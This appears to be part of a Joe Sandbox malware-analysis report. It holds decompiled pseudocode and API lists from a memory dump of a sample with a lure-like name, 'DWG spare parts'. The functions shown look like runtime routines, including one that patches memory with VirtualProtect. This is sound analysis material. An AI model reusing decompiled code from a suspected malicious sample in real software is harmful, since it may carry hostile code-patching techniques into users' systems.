                                                                • Instruction Fuzzy Hash: FAD05EA0BC13825AF7206EA89494B0537E8B3456A2F12292AE01255240C761881C9B0D
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 82%
                                                                			E0251E32C(signed short* __eax) {
                                                                				char _v260;
                                                                				char _v768;
                                                                				char _v772;
                                                                				signed short* _v776;
                                                                				signed short* _v780;
                                                                				char _v784;
                                                                				signed int _v788;
                                                                				char _v792;
                                                                				intOrPtr* _v796;
                                                                				signed char _t43;
                                                                				intOrPtr* _t60;
                                                                				void* _t79;
                                                                				void* _t81;
                                                                				void* _t84;
                                                                				void* _t85;
                                                                				intOrPtr* _t92;
                                                                				void* _t96;
                                                                				char* _t97;
                                                                				void* _t98;
                                                                
                                                                				_v776 = __eax;
                                                                				if((_v776[0] & 0x00000020) == 0) {
                                                                					E0251E20C(0x80070057);
                                                                				}
                                                                				_t43 =  *_v776 & 0x0000ffff;
                                                                				if((_t43 & 0x00000fff) == 0xc) {
                                                                					if((_t43 & 0x00000040) == 0) {
                                                                						_v780 = _v776[4];
                                                                					} else {
                                                                						_v780 =  *(_v776[4]);
                                                                					}
                                                                					_v788 =  *_v780 & 0x0000ffff;
                                                                					_t79 = _v788 - 1;
                                                                					if(_t79 >= 0) {
                                                                						_t85 = _t79 + 1;
                                                                						_t96 = 0;
                                                                						_t97 =  &_v772;
                                                                						do {
                                                                							_v796 = _t97;
                                                                							_push(_v796 + 4);
                                                                							_t22 = _t96 + 1; // 0x1
                                                                							_push(_v780);
                                                                							L0251D42C();
                                                                							E0251E20C(_v780);
                                                                							_push( &_v784);
                                                                							_t25 = _t96 + 1; // 0x1
                                                                							_push(_v780);
                                                                							L0251D434();
                                                                							E0251E20C(_v780);
                                                                							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                                                							_t96 = _t96 + 1;
                                                                							_t97 = _t97 + 8;
                                                                							_t85 = _t85 - 1;
                                                                						} while (_t85 != 0);
                                                                					}
                                                                					_t81 = _v788 - 1;
                                                                					if(_t81 >= 0) {
                                                                						_t84 = _t81 + 1;
                                                                						_t60 =  &_v768;
                                                                						_t92 =  &_v260;
                                                                						do {
                                                                							 *_t92 =  *_t60;
                                                                							_t92 = _t92 + 4;
                                                                							_t60 = _t60 + 8;
                                                                							_t84 = _t84 - 1;
                                                                						} while (_t84 != 0);
                                                                						do {
                                                                							goto L12;
                                                                						} while (E0251E2D0(_t83, _t98) != 0);
                                                                						goto L15;
                                                                					}
                                                                					L12:
                                                                					_t83 = _v788 - 1;
                                                                					if(E0251E2A0(_v788 - 1, _t98) != 0) {
                                                                						_push( &_v792);
                                                                						_push( &_v260);
                                                                						_push(_v780);
                                                                						L0251D43C();
                                                                						E0251E20C(_v780);
                                                                						E0251E524(_v792);
                                                                					}
                                                                				}
                                                                				L15:
                                                                				_push(_v776);
                                                                				L0251CFC4();
                                                                				return E0251E20C(_v776);
                                                                			}























                                                                APIs
                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0251E3DB
                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0251E3F7
                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0251E46E
                                                                • VariantClear.OLEAUT32(?), ref: 0251E497
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                • String ID:
                                                                • API String ID: 920484758-0
                                                                • Opcode ID: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                • Instruction ID: 81706893528035906b3761cf227f8adb6d55b1cda81150aa0765120506228a38
                                                                • Opcode Fuzzy Hash: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
                                                                • Instruction Fuzzy Hash: BC414A75A0122E8FDB66DF58C892BC9B7FDBF88300F0041D5E949A7211DA74AF808F58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0251AF48(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				char _v273;
                                                                				char _v534;
                                                                				char _v790;
                                                                				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                				char _v824;
                                                                				intOrPtr _v828;
                                                                				char _v832;
                                                                				intOrPtr _v836;
                                                                				char _v840;
                                                                				intOrPtr _v844;
                                                                				char _v848;
                                                                				char* _v852;
                                                                				char _v856;
                                                                				char _v860;
                                                                				char _v1116;
                                                                				void* __edi;
                                                                				struct HINSTANCE__* _t40;
                                                                				intOrPtr _t51;
                                                                				struct HINSTANCE__* _t53;
                                                                				void* _t69;
                                                                				void* _t73;
                                                                				intOrPtr _t74;
                                                                				intOrPtr _t83;
                                                                				intOrPtr _t86;
                                                                				intOrPtr* _t87;
                                                                				void* _t93;
                                                                
                                                                				_t93 = __fp0;
                                                                				_v8 = __ecx;
                                                                				_t73 = __edx;
                                                                				_t87 = __eax;
                                                                				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                					_t40 =  *0x256c7f0; // 0x2510000
                                                                					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                					_v12 = E0251AF3C(_t73);
                                                                				} else {
                                                                					_v12 = _t73 - _v820.AllocationBase;
                                                                				}
                                                                				E0251830C( &_v273, 0x104, E0251BDF0( &_v534, 0x5c) + 1);
                                                                				_t74 = 0x251b0c8;
                                                                				_t86 = 0x251b0c8;
                                                                				_t83 =  *0x2516d7c; // 0x2516dc8
                                                                				if(E02513DEC(_t87, _t83) != 0) {
                                                                					_t74 = E02514D64( *((intOrPtr*)(_t87 + 4)));
                                                                					_t69 = E025182E4(_t74, 0x251b0c8);
                                                                					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                						_t86 = 0x251b0cc;
                                                                					}
                                                                				}
                                                                				_t51 =  *0x2569dd0; // 0x2516b64
                                                                				_t16 = _t51 + 4; // 0xffe8
                                                                				_t53 =  *0x256c7f0; // 0x2510000
                                                                				LoadStringA(E02515AF0(_t53),  *_t16,  &_v790, 0x100);
                                                                				E02513BD8( *_t87,  &_v1116);
                                                                				_v860 =  &_v1116;
                                                                				_v856 = 4;
                                                                				_v852 =  &_v273;
                                                                				_v848 = 6;
                                                                				_v844 = _v12;
                                                                				_v840 = 5;
                                                                				_v836 = _t74;
                                                                				_v832 = 6;
                                                                				_v828 = _t86;
                                                                				_v824 = 6;
                                                                				E0251882C(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                                                				return E025182E4(_v8, _t86);
                                                                			}
































                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0251AF65
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0251AF89
                                                                • GetModuleFileNameA.KERNEL32(02510000,?,00000105), ref: 0251AFA4
                                                                • LoadStringA.USER32 ref: 0251B03A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                • Opcode ID: 39b36cb49c7ca855c1a2a83b57d21c7731212e21a8d75131946c670e1e36853b
                                                                • Instruction ID: 8086645cd369928906222f28ee71a668b588fc6ebfee8896df596fdaea2f936f
                                                                • Opcode Fuzzy Hash: 39b36cb49c7ca855c1a2a83b57d21c7731212e21a8d75131946c670e1e36853b
                                                                • Instruction Fuzzy Hash: 97412B71A402599BEB21DB68CC84BDAB7FDBB48304F0444E6E548E7241D7749F88CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 100%
                                                                			E0251AF46(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                				intOrPtr _v8;
                                                                				intOrPtr _v12;
                                                                				char _v273;
                                                                				char _v534;
                                                                				char _v790;
                                                                				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                				char _v824;
                                                                				intOrPtr _v828;
                                                                				char _v832;
                                                                				intOrPtr _v836;
                                                                				char _v840;
                                                                				intOrPtr _v844;
                                                                				char _v848;
                                                                				char* _v852;
                                                                				char _v856;
                                                                				char _v860;
                                                                				char _v1116;
                                                                				void* __edi;
                                                                				struct HINSTANCE__* _t40;
                                                                				intOrPtr _t51;
                                                                				struct HINSTANCE__* _t53;
                                                                				void* _t69;
                                                                				void* _t74;
                                                                				intOrPtr _t75;
                                                                				intOrPtr _t85;
                                                                				intOrPtr _t89;
                                                                				intOrPtr* _t92;
                                                                				void* _t105;
                                                                
                                                                				_v8 = __ecx;
                                                                				_t74 = __edx;
                                                                				_t92 = __eax;
                                                                				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                                                					_t40 =  *0x256c7f0; // 0x2510000
                                                                					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                					_v12 = E0251AF3C(_t74);
                                                                				} else {
                                                                					_v12 = _t74 - _v820.AllocationBase;
                                                                				}
                                                                				E0251830C( &_v273, 0x104, E0251BDF0( &_v534, 0x5c) + 1);
                                                                				_t75 = 0x251b0c8;
                                                                				_t89 = 0x251b0c8;
                                                                				_t85 =  *0x2516d7c; // 0x2516dc8
                                                                				if(E02513DEC(_t92, _t85) != 0) {
                                                                					_t75 = E02514D64( *((intOrPtr*)(_t92 + 4)));
                                                                					_t69 = E025182E4(_t75, 0x251b0c8);
                                                                					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                						_t89 = 0x251b0cc;
                                                                					}
                                                                				}
                                                                				_t51 =  *0x2569dd0; // 0x2516b64
                                                                				_t16 = _t51 + 4; // 0xffe8
                                                                				_t53 =  *0x256c7f0; // 0x2510000
                                                                				LoadStringA(E02515AF0(_t53),  *_t16,  &_v790, 0x100);
                                                                				E02513BD8( *_t92,  &_v1116);
                                                                				_v860 =  &_v1116;
                                                                				_v856 = 4;
                                                                				_v852 =  &_v273;
                                                                				_v848 = 6;
                                                                				_v844 = _v12;
                                                                				_v840 = 5;
                                                                				_v836 = _t75;
                                                                				_v832 = 6;
                                                                				_v828 = _t89;
                                                                				_v824 = 6;
                                                                				E0251882C(_v8,  &_v790, _a4, _t105, 4,  &_v860);
                                                                				return E025182E4(_v8, _t89);
                                                                			}
































                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0251AF65
                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0251AF89
                                                                • GetModuleFileNameA.KERNEL32(02510000,?,00000105), ref: 0251AFA4
                                                                • LoadStringA.USER32 ref: 0251B03A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                                • String ID:
                                                                • API String ID: 3990497365-0
                                                                • Opcode ID: 1888ee703cce4ff2d4e0ad7abb3b5035c829ad7886f4ae1b003a3265b55815e9
                                                                • Instruction ID: 4c1f0d4f5ca976b4c274cd5b356d42e20eb73201aea532e372704185345c8970
                                                                • Opcode Fuzzy Hash: 1888ee703cce4ff2d4e0ad7abb3b5035c829ad7886f4ae1b003a3265b55815e9
                                                                • Instruction Fuzzy Hash: 41412A71A402599BEB21DB68CC84BDAB7FDBB48304F0444E6E548E7241D7749F88CF58
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 87%
                                                                			E0252365C(void* __eax, long __ecx, void* __edx) {
                                                                				long _v16;
                                                                				void* __ebx;
                                                                				int _t3;
                                                                				void* _t8;
                                                                				void* _t14;
                                                                				long _t15;
                                                                				DWORD* _t16;
                                                                
                                                                				_push(__ecx);
                                                                				_t15 = __ecx;
                                                                				_t14 = __edx;
                                                                				_t8 = __eax;
                                                                				_t3 = VirtualProtect(__eax, __ecx, 0x40, _t16);
                                                                				if(_t3 != 0) {
                                                                					E02512DC8(_t14, _t8, _t15, _t8);
                                                                					FlushInstructionCache(GetCurrentProcess(), _t8, _t15);
                                                                					_t3 = VirtualProtect(_t8, _t15, _v16, _t16);
                                                                				}
                                                                				return _t3;
                                                                			}











                                                                APIs
                                                                • VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00000005,?,00000000,02516A0B,025236C5), ref: 0252366B
                                                                • GetCurrentProcess.KERNEL32(00000000,00000005,00000000,00000005,00000040,?,00000005,?,00000000,02516A0B,025236C5), ref: 02523682
                                                                • FlushInstructionCache.KERNEL32(00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,00000000,02516A0B,025236C5), ref: 02523688
                                                                • VirtualProtect.KERNEL32(00000000,00000005,025236C5,?,00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,00000000,02516A0B,025236C5), ref: 02523695
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                • String ID:
                                                                • API String ID: 4115577372-0
                                                                • Opcode ID: 9d93ba61a1ffc6d22192cd6e55df1b3d5b6bdb4c55d542b4732a858bdd434914
                                                                • Instruction ID: 1efe602ffa65b49d862920ffcd6b849ad835661119e09d4b3ca45af6ed0b3f98
                                                                • Opcode Fuzzy Hash: 9d93ba61a1ffc6d22192cd6e55df1b3d5b6bdb4c55d542b4732a858bdd434914
                                                                • Instruction Fuzzy Hash: 28E086A630222137B624317BDCC4DAB5ECEEFC67B1B100435B60CD3240D928DC0288BD
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 93%
                                                                			E02511C9C(signed int __eax, signed int __edx, void* __edi) {
                                                                				signed int _t58;
                                                                				signed int _t73;
                                                                				signed int _t80;
                                                                				signed int _t86;
                                                                				signed int _t94;
                                                                				signed int _t100;
                                                                				void* _t102;
                                                                				signed int _t111;
                                                                				signed int _t119;
                                                                				signed int _t125;
                                                                				signed int _t131;
                                                                				signed int _t133;
                                                                				signed int _t136;
                                                                				intOrPtr _t139;
                                                                				void* _t141;
                                                                				signed int _t143;
                                                                				signed int _t145;
                                                                				unsigned int _t146;
                                                                				signed int _t153;
                                                                				unsigned int _t154;
                                                                				intOrPtr _t157;
                                                                				void* _t160;
                                                                				intOrPtr _t168;
                                                                				intOrPtr _t170;
                                                                				signed int _t173;
                                                                				signed int _t174;
                                                                				signed int _t175;
                                                                				void* _t182;
                                                                				unsigned int _t184;
                                                                				signed int _t190;
                                                                				signed int _t193;
                                                                				signed int _t195;
                                                                				signed int _t196;
                                                                				signed int _t198;
                                                                				void* _t202;
                                                                				signed int _t203;
                                                                				signed int _t204;
                                                                				void* _t205;
                                                                				signed int _t208;
                                                                
                                                                				_t181 = __edi;
                                                                				_t166 = __edx;
                                                                				_t145 =  *(__eax - 4);
                                                                				_t196 = __eax;
                                                                				if((_t145 & 0x00000007) != 0) {
                                                                					__eflags = _t145 & 0x00000005;
                                                                					if((_t145 & 0x00000005) != 0) {
                                                                						__eflags = _t145 & 0x00000003;
                                                                						if((_t145 & 0x00000003) != 0) {
                                                                							__eflags = 0;
                                                                							return 0;
                                                                						} else {
                                                                							_t146 = _t145 - 0x18;
                                                                							__eflags = __edx - _t146;
                                                                							if(__edx <= _t146) {
                                                                								__eflags = __edx - _t146 >> 1;
                                                                								if(__edx < _t146 >> 1) {
                                                                									_t131 = __edx;
                                                                									_t58 = E02511754(__edx);
                                                                									__eflags = _t58;
                                                                									if(_t58 == 0) {
                                                                										goto L61;
                                                                									} else {
                                                                										__eflags = _t131 - 0x40a2c;
                                                                										if(_t131 > 0x40a2c) {
                                                                											 *((intOrPtr*)(_t58 - 8)) = _t131;
                                                                										}
                                                                										E025114D4(_t196, _t131, _t58);
                                                                										E02511ABC(_t196, _t181);
                                                                										return _t58;
                                                                									}
                                                                								} else {
                                                                									 *((intOrPtr*)(__eax - 8)) = __edx;
                                                                									return __eax;
                                                                								}
                                                                							} else {
                                                                								asm("adc eax, 0xffffffff");
                                                                								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
                                                                								_push(__edx);
                                                                								_t58 = E02511754((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
                                                                								_pop(_t168);
                                                                								__eflags = _t58;
                                                                								if(_t58 != 0) {
                                                                									__eflags = _t133 - 0x40a2c;
                                                                									if(_t133 > 0x40a2c) {
                                                                										 *((intOrPtr*)(_t58 - 8)) = _t168;
                                                                									}
                                                                									E025114A4(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
                                                                									E02511ABC(_t196, _t181);
                                                                									return _t58;
                                                                								}
                                                                								L61:
                                                                								return _t58;
                                                                							}
                                                                						}
                                                                					} else {
                                                                						_t153 = _t145 & 0xfffffff0;
                                                                						_push(__edi);
                                                                						_t182 = _t153 + __eax;
                                                                						_t154 = _t153 - 4;
                                                                						_t136 = _t145 & 0x0000000f;
                                                                						__eflags = __edx - _t154;
                                                                						if(__edx > _t154) {
                                                                							_t73 =  *(_t182 - 4);
                                                                							__eflags = _t73 & 0x00000001;
                                                                							if((_t73 & 0x00000001) == 0) {
                                                                								L51:
                                                                								asm("adc edi, 0xffffffff");
                                                                								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
                                                                								_t184 = _t154;
                                                                								_t80 = E02511754(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
                                                                								_t170 = _t166;
                                                                								__eflags = _t80;
                                                                								if(_t80 == 0) {
                                                                									goto L49;
                                                                								} else {
                                                                									__eflags = _t198 - 0x40a2c;
                                                                									if(_t198 > 0x40a2c) {
                                                                										 *((intOrPtr*)(_t80 - 8)) = _t170;
                                                                									}
                                                                									E025114A4(_t196, _t184, _t80);
                                                                									E02511ABC(_t196, _t184);
                                                                									return _t80;
                                                                								}
                                                                							} else {
                                                                								_t86 = _t73 & 0xfffffff0;
                                                                								_t202 = _t154 + _t86;
                                                                								__eflags = __edx - _t202;
                                                                								if(__edx > _t202) {
                                                                									goto L51;
                                                                								} else {
                                                                									__eflags =  *0x256a045;
                                                                									if(__eflags == 0) {
                                                                										L42:
                                                                										__eflags = _t86 - 0xb30;
                                                                										if(_t86 >= 0xb30) {
                                                                											E025114F0(_t182);
                                                                											_t166 = _t166;
                                                                											_t154 = _t154;
                                                                										}
                                                                										asm("adc edi, 0xffffffff");
                                                                										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                                										_t173 = _t202 + 4 - _t94;
                                                                										__eflags = _t173;
                                                                										if(_t173 > 0) {
                                                                											 *(_t196 + _t202 - 4) = _t173;
                                                                											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
                                                                											_t203 = _t94;
                                                                											__eflags = _t173 - 0xb30;
                                                                											if(_t173 >= 0xb30) {
                                                                												__eflags = _t94 + _t196;
                                                                												E02511530(_t94 + _t196, _t154, _t173);
                                                                											}
                                                                										} else {
                                                                											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
                                                                											_t203 = _t202 + 4;
                                                                										}
                                                                										_t204 = _t203 | _t136;
                                                                										__eflags = _t204;
                                                                										 *(_t196 - 4) = _t204;
                                                                										 *0x256a710 = 0;
                                                                										_t80 = _t196;
                                                                										L49:
                                                                										return _t80;
                                                                									} else {
                                                                										while(1) {
                                                                											asm("lock cmpxchg [0x256a710], ah");
                                                                											if(__eflags == 0) {
                                                                												break;
                                                                											}
                                                                											Sleep(0);
                                                                											_t166 = _t166;
                                                                											_t154 = _t154;
                                                                											asm("lock cmpxchg [0x256a710], ah");
                                                                											if(__eflags != 0) {
                                                                												Sleep(0xa);
                                                                												_t166 = _t166;
                                                                												_t154 = _t154;
                                                                												continue;
                                                                											}
                                                                											break;
                                                                										}
                                                                										_t136 = 0x0000000f &  *(_t196 - 4);
                                                                										_t100 =  *(_t182 - 4);
                                                                										__eflags = _t100 & 0x00000001;
                                                                										if((_t100 & 0x00000001) == 0) {
                                                                											L50:
                                                                											 *0x256a710 = 0;
                                                                											goto L51;
                                                                										} else {
                                                                											_t86 = _t100 & 0xfffffff0;
                                                                											_t202 = _t154 + _t86;
                                                                											__eflags = _t166 - _t202;
                                                                											if(_t166 > _t202) {
                                                                												goto L50;
                                                                											} else {
                                                                												goto L42;
                                                                											}
                                                                										}
                                                                									}
                                                                								}
                                                                							}
                                                                						} else {
                                                                							_t205 = __edx + __edx;
                                                                							__eflags = _t205 - _t154;
                                                                							if(_t205 < _t154) {
                                                                								__eflags = __edx - 0xb2c;
                                                                								if(__edx >= 0xb2c) {
                                                                									L19:
                                                                									_t16 = _t166 + 0xd3; // 0xbff
                                                                									_t208 = (_t16 & 0xffffff00) + 0x30;
                                                                									_t157 = _t154 + 4 - _t208;
                                                                									__eflags =  *0x256a045;
                                                                									if(__eflags != 0) {
                                                                										while(1) {
                                                                											asm("lock cmpxchg [0x256a710], ah");
                                                                											if(__eflags == 0) {
                                                                												break;
                                                                											}
                                                                											Sleep(0);
                                                                											_t157 = _t157;
                                                                											asm("lock cmpxchg [0x256a710], ah");
                                                                											if(__eflags != 0) {
                                                                												Sleep(0xa);
                                                                												_t157 = _t157;
                                                                												continue;
                                                                											}
                                                                											break;
                                                                										}
                                                                										_t136 = 0x0000000f &  *(_t196 - 4);
                                                                										__eflags = 0xf;
                                                                									}
                                                                									 *(_t196 - 4) = _t136 | _t208;
                                                                									_t139 = _t157;
                                                                									_t174 =  *(_t182 - 4);
                                                                									__eflags = _t174 & 0x00000001;
                                                                									if((_t174 & 0x00000001) != 0) {
                                                                										_t102 = _t182;
                                                                										_t175 = _t174 & 0xfffffff0;
                                                                										_t139 = _t139 + _t175;
                                                                										_t182 = _t182 + _t175;
                                                                										__eflags = _t175 - 0xb30;
                                                                										if(_t175 >= 0xb30) {
                                                                											E025114F0(_t102);
                                                                										}
                                                                									} else {
                                                                										 *(_t182 - 4) = _t174 | 0x00000008;
                                                                									}
                                                                									 *((intOrPtr*)(_t182 - 8)) = _t139;
                                                                									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
                                                                									__eflags = _t139 - 0xb30;
                                                                									if(_t139 >= 0xb30) {
                                                                										E02511530(_t196 + _t208, _t157, _t139);
                                                                									}
                                                                									 *0x256a710 = 0;
                                                                									return _t196;
                                                                								} else {
                                                                									__eflags = _t205 - 0xb2c;
                                                                									if(_t205 < 0xb2c) {
                                                                										_t190 = __edx;
                                                                										_t111 = E02511754(__edx);
                                                                										__eflags = _t111;
                                                                										if(_t111 != 0) {
                                                                											E025114D4(_t196, _t190, _t111);
                                                                											E02511ABC(_t196, _t190);
                                                                										}
                                                                										return _t111;
                                                                									} else {
                                                                										_t166 = 0xb2c;
                                                                										goto L19;
                                                                									}
                                                                								}
                                                                							} else {
                                                                								return __eax;
                                                                							}
                                                                						}
                                                                					}
                                                                				} else {
                                                                					_t141 =  *_t145;
                                                                					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
                                                                					if(_t160 < __edx) {
                                                                						_push(__edi);
                                                                						_t193 = __edx;
                                                                						asm("adc eax, 0xffffffff");
                                                                						_t119 = E02511754((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
                                                                						__eflags = _t119;
                                                                						if(_t119 != 0) {
                                                                							__eflags = _t193 - 0x40a2c;
                                                                							if(_t193 > 0x40a2c) {
                                                                								 *((intOrPtr*)(_t119 - 8)) = _t193;
                                                                							}
                                                                							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
                                                                							_t195 = _t119;
                                                                							 *((intOrPtr*)(_t141 + 0x1c))();
                                                                							E02511ABC(_t196, _t195);
                                                                							_t119 = _t195;
                                                                						}
                                                                						return _t119;
                                                                					} else {
                                                                						if(0x40 + __edx * 4 < _t160) {
                                                                							_t143 = __edx;
                                                                							_t125 = E02511754(__edx);
                                                                							__eflags = _t125;
                                                                							if(_t125 != 0) {
                                                                								E025114D4(_t196, _t143, _t125);
                                                                								E02511ABC(_t196, __edi);
                                                                								return _t125;
                                                                							}
                                                                							return _t125;
                                                                						} else {
                                                                							return __eax;
                                                                						}
                                                                					}
                                                                				}
                                                                			}











































                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • Opcode ID: b39d48fbc0957809695af2fe29c63e6db6dceb3aefe71d161f32cb1ee644bf96
                                                                • Instruction ID: 9133bd1592386f68ced9c9125cb8b5857bc447645814c4cba7885452957bffbc
                                                                • Opcode Fuzzy Hash: b39d48fbc0957809695af2fe29c63e6db6dceb3aefe71d161f32cb1ee644bf96
                                                                • Instruction Fuzzy Hash: 2AA1D966710A010BF718AA7DDD843ADB782BBC4325F18C6BED319CB381EB64C955875C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 76%
                                                                			E02519730(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                                                				char _v8;
                                                                				short _v18;
                                                                				short _v22;
                                                                				struct _SYSTEMTIME _v24;
                                                                				char _v280;
                                                                				intOrPtr _v284;
                                                                				char* _t34;
                                                                				intOrPtr* _t50;
                                                                				intOrPtr _t59;
                                                                				void* _t64;
                                                                				intOrPtr _t66;
                                                                				void* _t70;
                                                                
                                                                				_v8 = 0;
                                                                				_t50 = __edx;
                                                                				_t64 = __eax;
                                                                				_push(_t70);
                                                                				_push(0x251981e);
                                                                				_push( *[fs:eax]);
                                                                				 *[fs:eax] = _t70 + 0xfffffee8;
                                                                				E025148A0(__edx);
                                                                				_v24 =  *(_a4 - 0xe) & 0x0000ffff;
                                                                				_v22 =  *(_a4 - 0x10) & 0x0000ffff;
                                                                				_v18 =  *(_a4 - 0x12) & 0x0000ffff;
                                                                				if(_t64 > 2) {
                                                                					E02514938( &_v8, 0x2519840);
                                                                				} else {
                                                                					E02514938( &_v8, 0x2519834);
                                                                				}
                                                                				_t34 = E02514D64(_v8);
                                                                				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t34,  &_v280, 0x100) != 0) {
                                                                					E02514B10(_t50, 0x100,  &_v280);
                                                                					if(_t64 == 1 &&  *((char*)( *_t50)) == 0x30) {
                                                                						_v284 =  *_t50;
                                                                						_t66 = _v284;
                                                                						if(_t66 != 0) {
                                                                							_t66 =  *((intOrPtr*)(_t66 - 4));
                                                                						}
                                                                						E02514DC4( *_t50, _t66 - 1, 2, _t50);
                                                                					}
                                                                				}
                                                                				_pop(_t59);
                                                                				 *[fs:eax] = _t59;
                                                                				_push(E02519825);
                                                                				return E025148A0( &_v8);
                                                                			}
















                                                                APIs
                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0251981E), ref: 025197B6
                                                                • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0251981E), ref: 025197BC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
